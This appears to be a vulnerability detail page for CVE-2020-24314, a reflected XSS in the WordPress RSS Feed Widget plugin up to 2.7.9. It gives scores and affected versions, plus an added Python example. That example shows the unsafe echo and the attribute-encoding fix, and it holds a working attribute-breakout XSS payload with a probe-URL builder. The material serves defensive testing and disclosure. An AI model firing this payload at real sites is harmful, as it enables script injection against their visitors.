Vulnerability Details CVE-2020-24314
Fahad Mahmood RSS Feed Widget Plugin v2.7.9 and lower does not sanitize the value of the "t" GET parameter before echoing it back inside an input tag (an HTML attribute context). This is a reflected XSS: an attacker who gets a victim to open a specially crafted URL can close the attribute, inject markup or script, and have it execute in the victim's browser in the context of the affected site. Because the reflection lands inside an attribute value, the payload must first break out of the quoted attribute, and the corresponding fix is attribute-context output encoding (esc_attr() in WordPress) applied to the parameter before it is echoed.
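The following is an added example, not code from the plugin or from the advisory, illustrating the bug class above: a raw GET parameter echoed into an attribute, the attribute-encoded form that fixes it, and a probe check that parses the response as HTML so a reflection that stays inside the quoted attribute (harmless) is distinguished from one that breaks out of it (exploitable). The URL, the function names, the HTML skeleton and the probe payload are all assumptions made for the example; the plugin's real page path and markup are not given on this page.

```python
"""Reflected-XSS probe for a parameter echoed into an <input> attribute.

Added example for CVE-2020-24314's bug class; not the plugin's own code.
Everything below (HTML skeleton, target URL, function names) is hypothetical.
"""
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Probe payload (constructed): the leading double quote closes the
# value="..." attribute, '>' closes the <input> tag, and a new element with
# an event-handler attribute follows. If it survives unencoded, it executes.
PROBE = '"><img src=x onerror=alert(1)>'


def render_vulnerable(t: str) -> str:
    """Emulates the flaw: the raw GET parameter is echoed into an attribute."""
    return f'<form><input type="text" name="t" value="{t}"></form>'


def render_fixed(t: str) -> str:
    """Attribute-context encoding before echoing. In a WordPress plugin the
    idiomatic call is esc_attr($_GET['t']); html.escape(quote=True) is the
    Python equivalent (it encodes &, <, >, " and ')."""
    return f'<form><input type="text" name="t" value="{html.escape(t, quote=True)}"></form>'


def build_probe_url(base_url: str, payload: str = PROBE) -> str:
    """The crafted URL a tester would send; base_url is a placeholder."""
    return f"{base_url}?t={quote(payload, safe='')}"


class _TagCollector(HTMLParser):
    """Records every start tag with its attributes, as a browser would tokenise them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def injected_event_handlers(body: str):
    """Return (tag, attribute) pairs for every on* event-handler attribute the
    parser sees. For a page that should contain none, an empty list means the
    probe stayed inside the attribute value; a non-empty list means it broke
    out and created a new element with a handler."""
    parser = _TagCollector()
    parser.feed(body)
    parser.close()
    return [(tag, name) for tag, attrs in parser.tags
            for name in attrs if name.lower().startswith("on")]


def reflected_verbatim(body: str, payload: str = PROBE) -> bool:
    """Cheap first check: does the payload come back byte-for-byte?
    Necessary but not sufficient on its own (it would also flag a reflection
    inside a <textarea> or an HTML comment), hence injected_event_handlers()."""
    return payload in body


if __name__ == "__main__":
    print(build_probe_url("https://example.test/"))  # hypothetical target
    for label, page in (("vulnerable", render_vulnerable(PROBE)),
                        ("fixed", render_fixed(PROBE))):
        print(label, reflected_verbatim(page), injected_event_handlers(page))
```

Against a live target the same two checks apply to the fetched response body: first confirm the payload is reflected at all, then parse the body and look for a new element carrying an on* attribute. Running only the substring check produces false positives wherever the parameter is reflected into a context the probe cannot escape.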
Exploit prediction scoring system (EPSS) score
EPSS Score 0.002 (about a 0.2% estimated probability of exploitation in the wild within the next 30 days)
EPSS Ranking 45.8%
CVSS Severity
CVSS v3 Score 6.1 (Medium)
CVSS v2 Score 4.3 (Medium)
Products affected by CVE-2020-24314
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:1.1
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:1.2
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.0
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.0.1
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.1.0
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.2.0
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.2.3
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.3.0
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.3.3
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.1
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.2
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.3
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.4
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.5
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.6
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.7
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.8
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.9
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.0
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.1
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.2
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.3
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.4
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.5
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.6
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.7
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.8
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.9
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.0
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.1
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.2
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.3
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.4
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.5
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.6
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.7
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.8
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.9
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.0
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.1
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.2
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.3
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.4
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.5
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.6
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.7
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.8
- cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.9